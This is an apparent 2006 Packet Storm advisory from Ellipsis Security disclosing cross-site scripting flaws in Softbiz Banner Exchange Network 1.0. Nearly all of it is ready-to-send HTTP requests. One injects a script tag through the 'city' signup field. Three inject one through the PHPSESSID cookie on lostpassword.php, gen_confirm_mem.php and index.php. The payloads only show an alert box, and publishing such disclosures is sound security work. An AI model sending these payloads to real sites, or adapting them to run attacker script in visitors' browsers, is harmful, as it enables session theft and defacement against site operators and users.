softbiz10.txt

2006-07-02T00:00:00
ID PACKETSTORM:47915
Type packetstorm
Reporter Ellipsis Security
Modified 2006-07-02T00:00:00

Description

                                        
                                            `Softbiz Banner Exchange Network 1.0  
http://softbizscripts.com  
--------------------------  
Cross Site Scripting (XSS)  
--------------------------  
POST http://target.xx:80/insertmember.php HTTP/1.0  
Accept: */*  
Content-Type: application/x-www-form-urlencoded  
Host: target.xx  
Content-Length: 152  
uname=1&add=1&city="><script>alert(/Ellipsis+Security+Test/)</script>&state=1&country=0&url=http%3A%2F%2F&email=1&pwd=1&pwd2=1&submit=Signup  
---  
GET http://target.xx:80/lostpassword.php HTTP/1.0  
Accept: */*  
Host: target.xx  
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>  
---  
GET http://target.xx:80/gen_confirm_mem.php HTTP/1.0  
Accept: */*  
Host: target.xx  
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>  
---  
GET http://target.xx:80/index.php HTTP/1.0  
Accept: */*  
Host: target.xx  
Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script>  
-----------------  
Ellipsis Security  
http://ellsec.org  
`